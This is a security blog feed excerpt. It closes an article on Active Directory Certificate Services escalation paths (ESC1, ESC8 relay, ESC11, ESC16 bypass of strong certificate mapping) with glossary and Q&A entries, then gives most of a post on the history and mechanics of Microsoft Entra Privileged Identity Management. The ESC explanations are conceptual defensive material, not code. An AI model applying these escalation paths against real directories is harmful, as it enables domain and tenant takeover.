  { term: &quot;Strong vs Weak Mapping&quot;, definition: &quot;Per KB5014754: X509IssuerSerialNumber, X509SKI, X509SHA1PublicKey are strong; UPN, SAN, and other formats are weak and rejected under Full Enforcement.&quot; },
  { term: &quot;ADCSESC1&quot;, definition: &quot;BloodHound CE edge representing an ESC1 path: low-priv principal can enroll into a template with ESS + Client Authentication EKU.&quot; },
  { term: &quot;CoerceAndRelayNTLMToADCS&quot;, definition: &quot;BloodHound CE edge representing the ESC8 chain: SMB-coerce a computer, relay NTLM auth to the CA&apos;s Web Enrollment endpoint, get a certificate impersonating the coerced computer.&quot; }
]} questions={[
  { q: &quot;Why does rotating krbtgt not close the AD CS escalation paths?&quot;, a: &quot;Because every NTAuth-published CA&apos;s private key is a separate authenticator-minting trust root parallel to krbtgt. PKINIT honors any valid certificate signed by an NTAuth CA. Rotating krbtgt does not touch those private keys.&quot; },
  { q: &quot;Of the sixteen named ESCs, how many have received CVE-class Microsoft patches and which ones?&quot;, a: &quot;Three: CVE-2022-26923 (Certifried, the dNSHostName impersonation chain, May 2022), CVE-2024-49019 (EKUwu / ESC15, V1 template Application Policies override, November 2024), and the KB5005413 NTLM-relay hardening track for ESC8 (July 2021, configuration guidance rather than a binary patch).&quot; },
  { q: &quot;What is the difference between ESC8 and ESC11, and why does BloodHound CE graph one but not the other?&quot;, a: &quot;Both are NTLM relay attacks against AD CS. ESC8 relays to the HTTP Web Enrollment role service (/certsrv/). ESC11 relays to the default RPC enrollment transport (ICertPassage). BloodHound graphs ESC8 as the CoerceAndRelayNTLMToADCS edge because SMB coercion plus HTTP relay has a stable principal-graph shape; ESC11&apos;s RPC trigger (IF_ENFORCEENCRYPTICERTREQUEST not set) does not have an equivalent coercion gadget that the principal-graph model can express.&quot; },
  { q: &quot;Which ESC bypasses KB5014754&apos;s strong-mapping enforcement?&quot;, a: &quot;ESC16. The CA&apos;s DisableExtensionList registry value can list the szOID_NTDS_CA_SECURITY_EXT OID, instructing the CA to omit the SID extension from every certificate it issues. The KDC then falls back to weak mapping for those certificates, defeating the strong-mapping enforcement.&quot; },
  { q: &quot;What is the recommended Lane 3 response if a CA&apos;s private key is suspected compromised?&quot;, a: &quot;Revoke the CA&apos;s chain, decommission the CA, build a replacement on new hardware, publish the new CA into NTAuthCertificates, distrust the old CA&apos;s certificates throughout the forest, and re-issue every credential that depended on the compromised CA. A multi-week IR operation analogous in scale to a forest rebuild for krbtgt compromise.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>ad-cs</category><category>pkinit</category><category>kerberos</category><category>red-team</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Privileged Identity Management: How a Two-State Role Assignment Retired Standing Admin</title><link>https://paragmali.com/blog/privileged-identity-management-how-a-two-state-role-assignme/</link><guid isPermaLink="true">https://paragmali.com/blog/privileged-identity-management-how-a-two-state-role-assignme/</guid><description>Microsoft Entra PIM did not add eight features. It added one field to the role-assignment object -- and everything else, from activation policies to GDAP, is downstream.</description><pubDate>Mon, 25 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Standing Global Administrator was never a design choice. It was the only posture a single-state role-assignment object could produce.** Microsoft Entra PIM added one field to that object -- `type: eligible | active` -- and everything downstream (activation policies, audit logs, access reviews, six PIM Alerts, PIM-for-Groups, PIM-for-Azure-Resources, GDAP, Lighthouse, PIM with Conditional Access) is a structural consequence of that single change. The pattern works for human users. The open boundary in 2026 is application identities -- service principals, managed identities, OAuth consent grants -- which route around PIM entirely via the Azure Instance Metadata Service endpoint at `169.254.169.254`, the bypass class Andy Robbins documented in June 2022 and MITRE ATT&amp;amp;CK now maps to T1078.004.
&lt;h2&gt;1. The Tenant with Zero Standing Global Administrators&lt;/h2&gt;
&lt;p&gt;At 14:03:01 on a Tuesday in 2026, &lt;a href=&quot;mailto:alice@contoso.com&quot; rel=&quot;noopener&quot;&gt;alice@contoso.com&lt;/a&gt; became Global Administrator of her company&apos;s Microsoft Entra tenant. At 15:03:01 the same day, she stopped being one. In between, she restored a deleted user, exported an audit log, and produced a single PIM record: &lt;code&gt;Justification&lt;/code&gt; reads &quot;incident MSRC-2026-PIM-12345, ticket SNOW-INC-987654&quot;; &lt;code&gt;Approver&lt;/code&gt; reads &quot;&lt;a href=&quot;mailto:bob@contoso.com&quot; rel=&quot;noopener&quot;&gt;bob@contoso.com&lt;/a&gt; (decided 14:02:17)&quot;; &lt;code&gt;ActivatedAt&lt;/code&gt; and &lt;code&gt;ExpiredAt&lt;/code&gt; differ by exactly &lt;code&gt;PT1H&lt;/code&gt;. The SOC 2 auditor signed it off without follow-up questions.&lt;/p&gt;
&lt;p&gt;The 2015-vintage version of the same tenant looked nothing like this. Twelve standing Global Administrators. No multifactor challenge at privilege use. No approval workflow. No justification field. No audit trail beyond ordinary sign-in logs. A single phish of any one of those twelve identities was tenant takeover. The math required no sophistication: the attack surface for &quot;Global Administrator of contoso.com&quot; equalled the union of twelve personal attack surfaces, indefinitely.&lt;/p&gt;
&lt;p&gt;What changed between the two tenants is not a habit, not a policy, not a culture shift. It is a single field on a single object inside Microsoft Entra ID.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Standing admin was never a deliberate design decision. It was the only deployment posture a single-state role-assignment object could produce. Once Microsoft made the role-assignment object two-state, JIT admin became expressible -- and standing admin became visibly the anti-pattern it had been since 1975.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To explain that field, and to explain why it took fifty-one years to ship, we start where the principle did: a 1975 paper by two MIT researchers who knew what privilege should look like but had no mechanism to enforce it.&lt;/p&gt;
&lt;h2&gt;2. The Default Wasn&apos;t a Decision&lt;/h2&gt;
&lt;p&gt;Who designed the standing Domain Admin pattern? No one. It was the only assignment category Active Directory shipped with.&lt;/p&gt;
&lt;p&gt;A forty-year deployment posture with no author. That is the first thing to internalize. Standing admin is what happens when a data model offers exactly one assignment category and operators still have real work to do. Every later &quot;best practice&quot; was an attempt to talk operators out of the one tool they had been given.&lt;/p&gt;
&lt;h3&gt;1975: The principle without a mechanism&lt;/h3&gt;
&lt;p&gt;In September 1975, Jerome Saltzer and Michael Schroeder published &lt;em&gt;The Protection of Information in Computer Systems&lt;/em&gt; in the &lt;em&gt;Proceedings of the IEEE&lt;/em&gt; [@saltzer-schroeder-1975]. The paper is a survey of secure-systems design, organized around eight named design principles that the authors crystallized from work on Multics and other early protected operating systems. Both authors were affiliated with MIT&apos;s Project MAC and the Department of Electrical Engineering and Computer Science [@saltzer-mit-meta].&lt;/p&gt;
&lt;p&gt;The sixth principle, named &lt;strong&gt;Least Privilege&lt;/strong&gt;, is the one every later JIT-admin product cites:&lt;/p&gt;

Every program and every user of the system should operate using the least set of privileges necessary to complete the job. -- Saltzer &amp;amp; Schroeder, *The Protection of Information in Computer Systems*, 1975, Design Principle (f), the sixth of eight [@saltzer-schroeder-1975]

Design Principle (f), the sixth of eight, in the 1975 Saltzer and Schroeder paper. Every program and every user of the system should operate using the least set of privileges necessary to complete the job. The principle is correct, parsimonious, and -- for four decades after publication -- mechanically unenforceable for the temporal case. Static enforcement (ACLs, capability lists, ring boundaries) was tractable in 1975; bounding the time interval during which a privilege is held was not.
&lt;p&gt;Read the principle carefully. It does not say &quot;every user should hold the least set of privileges.&quot; It says they should &lt;em&gt;operate using&lt;/em&gt; the least set of privileges. The two formulations look identical until you ask what a person does between bursts of administrative work. A user who holds the privilege &quot;permanently active&quot; is operating using it permanently, whether they touch the system or not. The 1975 paper points at the temporal dimension and walks past it. The worked examples cover static mechanisms -- protection rings, access control lists, capability tickets -- not time-bounded ones. The principle was correct. The mechanism did not yet exist.&lt;/p&gt;
&lt;p&gt;For the next forty years, every approximation tried to compensate. UNIX &lt;code&gt;sudo&lt;/code&gt; (1980) bound elevation to a single command. Kerberos delegation (1988) bound impersonation to a ticket. Windows DACLs and Active Directory groups (1993 and 2000) bound access to a static membership list. None made temporal least privilege a first-class data-model property. None let an operator say &quot;I am eligible to be Domain Admin, but I am not Domain Admin right now.&quot;&lt;/p&gt;

Microsoft&apos;s 2014 *Mitigating Pass-the-Hash v2* whitepaper introduced a three-tier administrative model. Tier 0 is identity-system-critical: domain controllers, ADFS, PKI, anything whose compromise gives forest-wide privilege. Tier 1 is enterprise servers and business-critical applications. Tier 2 is user workstations and end users. The enforcement rule is one sentence: an administrator credential for Tier N must never be exposed to a system at a higher (numerically larger) tier. Microsoft has progressively retired this framing in favour of the Enterprise Access Model, which we revisit in section 6.
&lt;h3&gt;2000-2013: Group membership as a boolean&lt;/h3&gt;
&lt;p&gt;When Active Directory shipped with Windows 2000 on February 17, 2000 [@ms-news-windows-2000-launch], privileged access was structurally a boolean property of the principal. A user was either a member of &lt;code&gt;BUILTIN\Administrators&lt;/code&gt;, &lt;code&gt;Domain Admins&lt;/code&gt;, &lt;code&gt;Enterprise Admins&lt;/code&gt;, or &lt;code&gt;Schema Admins&lt;/code&gt;, or they were not. The membership lived in the directory as the &lt;code&gt;member&lt;/code&gt; attribute on the group object (and the &lt;code&gt;memberOf&lt;/code&gt; back-link on the user). It was set when assignment was made, unset when an administrator manually revoked it. No third state. No attribute could hold one.&lt;/p&gt;

A privileged identity whose role assignment is active and permanent. The role&apos;s permissions are granted continuously, regardless of whether the principal is currently exercising the privilege. Standing admin is the default state of any pre-PIM tenant and the deployed-reality state of most AD-only environments through 2026.
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&apos;s Privilege Attribute Certificate&lt;/a&gt; -- the PAC -- carried the user&apos;s group SIDs forward into every Kerberos ticket the user obtained.The Privilege Attribute Certificate is the data structure inside a Kerberos ticket that lists the user&apos;s group SIDs. Pre-2016 Active Directory had no per-membership TTL metadata in the PAC. There was nowhere in the existing schema to put an expiry timestamp, which is why on-prem JIT membership later required a &lt;em&gt;separate forest&lt;/em&gt; rather than an in-directory mechanism. A ticket&apos;s lifetime was bounded; the SID set inside it was not. There was no per-membership TTL anywhere in the system. If you wanted &quot;Alice is Domain Admin between 14:00 and 15:00 today and not otherwise,&quot; the directory had no machinery to express it. Alice was Domain Admin permanently, or not at all.&lt;/p&gt;
&lt;p&gt;Twenty years of deployment matched the data model exactly. A typical 2010-vintage enterprise ran ten to thirty standing Domain Administrators across business units, because manually adding and removing membership for each task was untenable at human scale. The data model did not punish standing membership; the operator chose the only category the directory offered.&lt;/p&gt;
&lt;h3&gt;December 2012: Microsoft names the failure mode&lt;/h3&gt;
&lt;p&gt;In December 2012, Patrick Jungles, Mark Simos, Aaron Margosis, Roger Grimes, Laura Robinson and the Microsoft Trustworthy Computing team published &lt;em&gt;Mitigating Pass-the-Hash and Other Credential Theft, Version 1&lt;/em&gt; [@pth-download-center], [@berkouwer-pth-2013]. It is the first formal Microsoft acknowledgment that credential-theft propagation through Active Directory was not a software defect to be patched but a structural property of standing admin membership.&lt;/p&gt;
&lt;p&gt;The argument is direct. If twelve Domain Admins exist, the attack surface of &quot;Domain Admin of contoso.local&quot; is the union of those twelve people&apos;s personal attack surfaces. Any one gets phished, or gets hash-extracted from a Tier-1 server they accidentally signed into, and the attacker has Domain Admin permanently. The MIM PAM documentation later restated the failure in one sentence: &lt;em&gt;&quot;Today, it&apos;s too easy for attackers to obtain Domain Admins account credentials, and it&apos;s too hard to discover these attacks after the fact&quot;&lt;/em&gt; [@ms-learn-mim-pam-overview].&lt;/p&gt;
&lt;h3&gt;2014: The tier model arrives, the mechanism does not&lt;/h3&gt;
&lt;p&gt;The 2014 update -- &lt;em&gt;Mitigating Pass-the-Hash, Version 2&lt;/em&gt; [@pth-download-center] -- generalized the threat model and introduced the &lt;a href=&quot;https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/&quot; rel=&quot;noopener&quot;&gt;Tier-0 / Tier-1 / Tier-2 framing&lt;/a&gt; as a structural mitigation. v2 said two things clearly that v1 had only implied. First, standing membership in Tier-0 groups was the root cause, not a downstream defect. Second, the mitigation pattern -- isolate tiers, reduce the standing count, use dedicated Privileged Access Workstations -- was &lt;em&gt;guidance&lt;/em&gt;, not a mechanism. Microsoft Trustworthy Computing did not yet have a product that could mechanically time-bound group membership in Active Directory.&lt;/p&gt;
&lt;p&gt;v2 named the problem, drew the threat model, and recommended the structural fix. What it could not do was ship a mechanism. The mechanism would come, but on the wrong side of the cloud boundary.&lt;/p&gt;
&lt;h2&gt;3. The On-Prem Detour: MIM 2016 PAM, Bastion Forests, and Shadow Principals&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s first mechanical JIT-admin product was not in the cloud. It was on-premises, and it required a separate Active Directory forest.&lt;/p&gt;
&lt;p&gt;Stop and re-read that. To bound the duration of a group membership in pre-2016 Active Directory, Microsoft had to build a &lt;em&gt;different&lt;/em&gt; directory and inject SIDs from one into the other across a trust. The reason was the data model. The production forest&apos;s &lt;code&gt;member&lt;/code&gt; attribute had no TTL field. Adding one meant changing the AD schema. Changing the schema meant a Windows Server release. So while the schema change was in flight, Microsoft shipped the on-prem JIT-admin product on a different architecture: ask the operator to stand up a second forest whose only job was to issue time-bounded SIDs into the first.&lt;/p&gt;
&lt;h3&gt;August 6, 2015: MIM 2016 ships PAM&lt;/h3&gt;
&lt;p&gt;On August 6, 2015, Microsoft Identity Manager 2016 reached general availability and shipped a new capability named &lt;strong&gt;Privileged Access Management&lt;/strong&gt; [@ms-learn-mim-pam-overview]. The architecture is the interesting part. MIM PAM uses three primitives that, together, give Active Directory a mechanically time-bounded group membership for the first time:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;strong&gt;bastion forest&lt;/strong&gt; -- an entirely separate Active Directory forest, sometimes called the &quot;red&quot; forest or &quot;admin&quot; forest, where privileged accounts live.&lt;/li&gt;
&lt;li&gt;A one-way &lt;strong&gt;PAM trust&lt;/strong&gt; from the production forest to the bastion forest, configured for selective authentication.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shadow principal&lt;/strong&gt; objects in the bastion forest, each carrying a SID that names a real privileged group in the production forest.&lt;/li&gt;
&lt;/ol&gt;

A separate Active Directory forest dedicated to housing privileged accounts. In MIM 2016 PAM the bastion forest holds shadow-principal objects whose SIDs point at production-forest privileged groups; a one-way PAM trust lets the production forest accept those SIDs in incoming Kerberos tickets for a bounded duration.

An Active Directory object (schema class `msDS-ShadowPrincipal`, introduced in Windows Server 2016) that represents a foreign user, group, or computer in the bastion forest and carries an `msDS-ShadowPrincipalSid` attribute populated with the SID of a production-forest privileged group. Membership in a shadow principal results in that production-forest SID being added to the requesting user&apos;s Kerberos PAC for the membership TTL.
&lt;p&gt;The activation flow is direct. A user in the bastion forest requests privilege through the MIM Portal. An approver decides. MIM writes a TTL-bounded membership in the appropriate shadow principal, with the TTL enforced by the Windows Server 2016 temporal-group-membership feature [@teal-esae3]. The bastion KDC injects the production-forest SID into the user&apos;s Kerberos PAC. The production forest accepts that SID across the PAM trust. After the TTL expires, subsequent ticket renewals exclude the privileged SID, and the user no longer holds the privilege.&lt;/p&gt;

flowchart LR
    subgraph BASTION[&quot;CORP-PRIV bastion forest&quot;]
        A[&quot;Privileged user account&quot;]
        SP[&quot;Shadow principal (msDS-ShadowPrincipal) carries production SID, TTL&quot;]
        BKDC[&quot;Bastion KDC&quot;]
        A --&amp;gt;|&quot;Time-bound membership&quot;| SP
        SP --&amp;gt; BKDC
    end
    subgraph PROD[&quot;CORP production forest&quot;]
        DA[&quot;Domain Admins&quot;]
        PKDC[&quot;Production KDC&quot;]
    end
    BKDC --&amp;gt;|&quot;Kerberos ticket carries injected SID via PAM trust&quot;| PKDC
    PKDC --&amp;gt;|&quot;SID in PAC grants membership for TTL only&quot;| DA
&lt;h3&gt;October 15, 2016: Windows Server 2016 makes the mechanism real&lt;/h3&gt;
&lt;p&gt;For the first fourteen months of MIM 2016&apos;s life, the full feature did not work. The temporal-group-membership and shadow-principal schema classes that MIM PAM depends on are AD primitives that arrived only with Windows Server 2016, which reached general availability on October 15, 2016 [@ms-learn-lifecycle-ws2016]. Microsoft Learn states the requirement directly: &lt;em&gt;&quot;With Windows Server 2016, PAM features of time-limited group memberships and shadow principal groups are built into Windows Server Active Directory&quot;&lt;/em&gt; [@ms-learn-raise-bastion], and &lt;em&gt;&quot;All domain controllers in the bastion environment for the PRIV forest must be Windows Server 2016 or later&quot;&lt;/em&gt; [@ms-learn-raise-bastion].The PAM trust is technically a forest trust with selective authentication enabled. The selective authentication flag is what prevents the bastion forest&apos;s privileged identities from being usable for anything other than the explicit shadow-principal SID injection -- without it, the bastion forest would itself become a sprawling privileged-access surface.&lt;/p&gt;
&lt;p&gt;This is the moment AD itself gains a temporal least-privilege primitive, forty-one years after Saltzer and Schroeder published the principle. The mechanism is real, but the operational profile is brutal.&lt;/p&gt;
&lt;h3&gt;Three reasons it did not generalize&lt;/h3&gt;
&lt;p&gt;MIM PAM solved exactly one problem and could not be extended to the next. Three structural constraints kept it confined to a niche.&lt;/p&gt;
&lt;p&gt;First, &lt;strong&gt;it was on-premises only&lt;/strong&gt;. A bastion forest is an Active Directory artifact. Microsoft Entra ID, Office 365, and Azure RBAC role assignments live in a different identity system, with no concept of a forest, no PAM trust target, and no place to plug a shadow-principal object. MIM PAM had no cloud story, and by 2015 the cloud was already where most new Microsoft privileged-access surfaces were being deployed.&lt;/p&gt;
&lt;p&gt;Second, &lt;strong&gt;the operational complexity filtered out everyone except the most security-mature shops&lt;/strong&gt;. A bastion forest is a separate Active Directory forest, with its own domain controllers, replication, backup, disaster recovery, and PKI implications. The deployment also requires MIM Service, MIM Portal, MIM Web Service, and SQL Server. Auditing the PAM trust correctly is itself non-trivial work. Microsoft Learn now positions MIM PAM as appropriate only for isolated, non-Internet-connected deployments [@ms-learn-mim-pam-overview]; the verbatim positioning and the MIM 2016 lifecycle details are in the Callout below.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Learn states MIM PAM is &quot;not recommended for new deployments in Internet-connected environments&quot; and positions it for &quot;isolated AD environments where Internet access is not available&quot; [@ms-learn-mim-pam-overview]. MIM 2016 itself remains in extended support through January 9, 2029 [@ms-learn-mim-2016], and Microsoft has shipped SP3 compatibility updates for SharePoint Subscription Edition, Exchange SE, and SQL Server 2022 -- but the cloud-first Entra PIM path is the canonical answer for new tenants.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Third, &lt;strong&gt;the forest-functional-level dependency delayed real deployment by more than a year&lt;/strong&gt;. Shadow principals were not usable until Windows Server 2016 reached GA in October 2016. MIM 2016 had been generally available since August 2015. For its first fourteen months in market, the headline JIT-admin feature could not be configured at full fidelity. By the time Windows Server 2016 shipped, Microsoft was already operating its cloud PIM in production.&lt;/p&gt;
&lt;h3&gt;What the on-prem detour reveals about the cloud&apos;s shape&lt;/h3&gt;
&lt;p&gt;MIM PAM mechanically bounds membership &lt;em&gt;in groups&lt;/em&gt; via &lt;em&gt;shadow principals&lt;/em&gt; in &lt;em&gt;a separate forest&lt;/em&gt;. The cloud has no concept of a forest. So the cloud-native mechanical bound must attach to the &lt;em&gt;assignment object&lt;/em&gt; directly, not to the &lt;em&gt;group object indirected through a separate forest&lt;/em&gt;. The cloud needed a new assignment-category type, not a new forest topology.&lt;/p&gt;
&lt;p&gt;The cloud does not have a forest. It has a role-assignment object. What if that object grew a second state?&lt;/p&gt;
&lt;h2&gt;4. The Breakthrough: A Two-State Role-Assignment Object&lt;/h2&gt;
&lt;p&gt;By August 2015, while MIM 2016 PAM was still in late preview for the on-premises case, the Microsoft Identity Division had already shipped something different for the cloud. They shipped a role-assignment object with one new field. That field changed everything that came after it.&lt;/p&gt;
&lt;h3&gt;The 2015 preview&lt;/h3&gt;
&lt;p&gt;Alex Simons&apos;s August 27, 2015 capability-update post on the CloudBlogs (now migrated to Microsoft Tech Community) is the first public articulation of what Azure AD PIM was building [@simons-2015-aug]. It introduced four surfaces: an &lt;strong&gt;eligible&lt;/strong&gt; assignment category distinct from active, multifactor authentication required at activation, security alerts that watched for privileged-role anomalies, and what the post called Security Reviews -- the precursor to access reviews. The architecture under those four surfaces is the load-bearing part: a single new field on the role-assignment object.&lt;/p&gt;
&lt;p&gt;On September 15, 2016, Azure AD Premium P2 reached general availability and carried the first generally-available cloud-native PIM, attributed to Joy Chik (then Corporate Vice President of the Identity Division) and the Identity engineering team [@techcommunity-p2-ga]. Eligible-versus-active was now a billable, supported, production-grade feature.&lt;/p&gt;
&lt;h3&gt;The one-function spine&lt;/h3&gt;
&lt;p&gt;Read this carefully. It is the article&apos;s central claim.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Standing admin was the default not because anyone thought it was secure, but because the role-assignment object had only one state. PIM&apos;s contribution is to add a second state -- &lt;code&gt;eligible&lt;/code&gt; -- and to make the transition from eligible to active a gated, audited, time-bounded operation that is by definition mediated by PIM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The principle was Saltzer and Schroeder, 1975. The recognition that standing admin was the failure mode was &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt;, 2012 and 2014. The on-premises mechanism was MIM 2016 PAM. The cloud answer is a different shape entirely: not a new directory and a SID-injection trust, but a single field on the assignment object itself.&lt;/p&gt;
&lt;p&gt;Microsoft Learn documents the resulting terminology in the PIM overview. A principal -- user, group, service principal, or managed identity -- can be &lt;code&gt;eligible&lt;/code&gt; or &lt;code&gt;active&lt;/code&gt; for a role, and either assignment can be &lt;code&gt;permanent&lt;/code&gt; or &lt;code&gt;time-bound&lt;/code&gt; [@ms-learn-pim-configure]. The same page elevates a forty-year-old phrase into a product term: &lt;em&gt;&quot;principle of least privilege access -- A recommended security practice in which every user is provided with only the minimum privileges needed to accomplish the tasks they&apos;re authorized to perform&quot;&lt;/em&gt; [@ms-learn-pim-configure]. The 1975 sentence is now a glossary entry inside a 2026 product, and the product has a mechanism that makes the sentence enforceable.&lt;/p&gt;
&lt;h3&gt;The formal tuple&lt;/h3&gt;
&lt;p&gt;Concretely, a PIM-managed role assignment is a 5-tuple. Let $A = (p, r, s, t, d)$ where $p$ is the principal, $r$ is the role, $s$ is the scope, $t \in {\text{eligible}, \text{active}}$, and $d \in {\text{permanent}, \text{time-bound}[s_0, e_0]}$. The activation transition is&lt;/p&gt;
&lt;p&gt;$$\text{activate}: A_{t=\text{eligible}} \longrightarrow A_{t=\text{active},\ d=\text{time-bound}[\text{now},\ \text{now}+\Delta]}$$&lt;/p&gt;
&lt;p&gt;subject to the per-role activation policy. The interesting part is what the tuple makes expressible:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RoleAssignment = {
    principal:  user | group | service principal | managed identity,
    role:       Entra directory role | Azure RBAC role | group membership | group ownership,
    scope:      directory | management-group | subscription | resource-group | resource | group,
    type:       eligible | active,
    duration:   permanent | time-bound[start, end]
}

activate: eligible_assignment -&amp;gt; active_assignment   // PIM-mediated, gated, audited
&lt;/code&gt;&lt;/pre&gt;

A PIM-managed role assignment that grants no privilege until the principal invokes `activate()`. The eligible assignment is the standing relationship between principal and role; the active assignment is the time-bounded materialization that follows when the activation policy is satisfied [@ms-learn-pim-configure].

A PIM-managed role assignment that grants the role&apos;s permissions for the duration of the assignment. Active assignments are either permanent (the legacy pre-PIM posture, or an explicit permanent-active PIM assignment) or time-bound (the result of an `activate()` call on an eligible assignment) [@ms-learn-pim-configure].

flowchart TD
    subgraph Permanent[&quot;Permanent duration&quot;]
        PE[&quot;Permanent eligible -- standing eligibility, no privilege held&quot;]
        PA[&quot;Permanent active -- legacy standing admin&quot;]
    end
    subgraph TimeBound[&quot;Time-bound duration&quot;]
        TE[&quot;Time-bound eligible -- standing eligibility with end date&quot;]
        TA[&quot;Time-bound active -- JIT admin after activate()&quot;]
    end
    PE --&amp;gt;|&quot;activate()&quot;| TA
    TE --&amp;gt;|&quot;activate()&quot;| TA
    TA --&amp;gt;|&quot;expire or deactivate()&quot;| PE
    PA --&amp;gt;|&quot;legacy posture being retired&quot;| PE
&lt;p&gt;The grid has only four cells. Permanent active is the pre-PIM world, the standing-admin posture every later best practice has been trying to retire. Time-bound active is the JIT-admin state, materialized only at the moment of work and expired shortly after. The two eligible states -- permanent or time-bound -- are the standing relationships between a principal and a role that grant no privilege at rest. The expressive change is small. The deployment consequences are total.&lt;/p&gt;

PIM did not add eight features. It added one field, and everything else is downstream.
&lt;p&gt;This is Aha #1. The reader who came in believing standing admin persisted for forty years because operators lacked discipline now sees it differently. Operator discipline was a fragile workaround for a missing data-model field. The 1975 principle was correct. The 2012-2014 PtH whitepapers were correct. The operators were not the problem. The role-assignment object had one state to be in, and the deployment matched the data model exactly. The fix was a structural change to the data model.&lt;/p&gt;
&lt;p&gt;The next nine years of PIM history are about extending that two-state primitive: to Azure RBAC, to security groups, to partner tenants, to the conditional-access plane, and to a detection layer that flags people who try to skip activation entirely. We walk each extension in turn. First, the mechanism itself.&lt;/p&gt;
&lt;h2&gt;5. Anatomy of an Activation&lt;/h2&gt;
&lt;p&gt;We have seen what changed. Walk through what happens, end to end, when &lt;a href=&quot;mailto:alice@contoso.com&quot; rel=&quot;noopener&quot;&gt;alice@contoso.com&lt;/a&gt; clicks &quot;Activate&quot; on her eligible Global Administrator assignment at 14:00:00 on a Tuesday.&lt;/p&gt;
&lt;h3&gt;The activation flow, step by step&lt;/h3&gt;
&lt;p&gt;Six things happen, in order, and each writes audit-log evidence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The eligible assignment already exists.&lt;/strong&gt; Alice has been a permanent-eligible Global Administrator since she was hired. The PIM directory object records principal &lt;code&gt;alice@contoso.com&lt;/code&gt;, role &lt;code&gt;Global Administrator&lt;/code&gt;, scope &lt;code&gt;directory&lt;/code&gt;, &lt;code&gt;type=eligible&lt;/code&gt;, &lt;code&gt;duration=permanent&lt;/code&gt;. Today she holds zero of the role&apos;s permissions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The activation request lands on PIM.&lt;/strong&gt; Alice clicks Activate in the Entra admin centre, or fires the equivalent Microsoft Graph call. PIM pulls the activation policy for &lt;code&gt;(role=Global Administrator, scope=directory)&lt;/code&gt; and prepares to evaluate the gates [@ms-learn-pim-change-default-settings].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The policy gates evaluate.&lt;/strong&gt; This is the load-bearing part, and the place readers most often misread the docs. The gates are per-role configurable, not universal. Microsoft Learn documents five gates the tenant can independently switch on or off [@ms-learn-pim-change-default-settings]:&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Multifactor authentication at activation&lt;/strong&gt; if &lt;code&gt;requires_mfa&lt;/code&gt; is set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Approval routing&lt;/strong&gt; to named approvers or an approver group if &lt;code&gt;requires_approval&lt;/code&gt; is set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Justification text capture&lt;/strong&gt; if &lt;code&gt;requires_justification&lt;/code&gt; is set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ticket number capture&lt;/strong&gt;, optionally tagged with a ticketing-system identifier, if &lt;code&gt;requires_ticket&lt;/code&gt; is set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Activation duration validation&lt;/strong&gt; against the per-role configurable maximum -- one to twenty-four hours, with one hour the default for the highest-privileged Entra roles such as Global Administrator and Privileged Role Administrator [@ms-learn-pim-change-default-settings].&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PIM materializes the active assignment.&lt;/strong&gt; Microsoft Learn states the latency directly: &lt;em&gt;&quot;Microsoft Entra PIM creates active assignment (assigns user to a role) within seconds&quot;&lt;/em&gt; [@ms-learn-pim-activate]. A new token Alice obtains after this moment will carry the activated role&apos;s claims.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The PIM audit log records the entire transaction.&lt;/strong&gt; A new entry captures the request, the approver&apos;s decision and decision time, the justification text, the ticket reference, the activation start, and the planned expiry. The audit log is retained for thirty days by default and can be routed to Azure Monitor for longer retention [@ms-learn-pim-audit-log].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auto-deactivation fires at the duration boundary.&lt;/strong&gt; At 15:00:00 -- one hour after activation -- PIM deactivates the assignment within seconds [@ms-learn-pim-activate]. Alice can also call &lt;code&gt;deactivate()&lt;/code&gt; explicitly to return early.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    autonumber
    participant User as alice
    participant PIM
    participant MFA
    participant Approver as bob
    participant Graph as Microsoft Graph
    participant Audit as PIM audit log
    User-&amp;gt;&amp;gt;PIM: Activate Global Administrator
    PIM-&amp;gt;&amp;gt;MFA: Require MFA challenge
    MFA--&amp;gt;&amp;gt;PIM: MFA passed
    PIM-&amp;gt;&amp;gt;Approver: Route approval request
    Approver--&amp;gt;&amp;gt;PIM: Approve with justification context
    PIM-&amp;gt;&amp;gt;Graph: Materialize active assignment within seconds
    PIM-&amp;gt;&amp;gt;Audit: Write request, decision, materialization records
    Note over PIM,Audit: Token issued with activated role claims
    Note over PIM,Graph: One-hour TTL begins
    PIM-&amp;gt;&amp;gt;Graph: Auto-deactivate at expiry within seconds
    PIM-&amp;gt;&amp;gt;Audit: Write deactivation record
&lt;h3&gt;Activation policies are configured, not assumed&lt;/h3&gt;
